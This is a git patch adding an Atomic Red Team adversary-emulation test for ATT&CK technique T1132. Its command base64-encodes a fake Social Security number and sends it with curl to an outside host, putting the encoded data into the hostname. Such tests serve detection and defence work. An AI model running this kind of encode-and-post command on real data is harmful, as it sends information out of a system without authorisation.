From fda57a086be0d1cfb8b5cfd652f12399e72e5df7 Mon Sep 17 00:00:00 2001
From: Swelc <shane@swelcher.com>
Date: Mon, 2 Jul 2018 21:39:25 -0500
Subject: [PATCH] T1132 Base64 Encoded Data

---
 atomics/T1132/T1132.yaml | 28 ++++++++++++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 atomics/T1132/T1132.yaml

diff --git a/atomics/T1132/T1132.yaml b/atomics/T1132/T1132.yaml
new file mode 100644
index 00000000..246f67a8
--- /dev/null
+++ b/atomics/T1132/T1132.yaml
@@ -0,0 +1,28 @@
+---
+attack_technique: T1132
+display_name: Data Encoding
+
+atomic_tests:
+- name: Base64 Encoded data.
+  description: |
+    Utilizing a common technique for posting base64 encoded data.
+
+  supported_platforms:
+    - macos
+    - linux
+
+  input_arguments:
+    destination_url:
+      description: Destination URL to post encoded data.
+      type: string
+      default: redcanary.com
+    base64_data:
+      description: Encoded data to post using fake Social Security number 111-11-1111.
+      type: string
+      default: MTExLTExLTExMTE=
+
+  executor:
+    name: sh
+    command: |
+      echo -n 111-11-1111 | base64
+      curl -XPOST #{base64_data}.#{destination_url}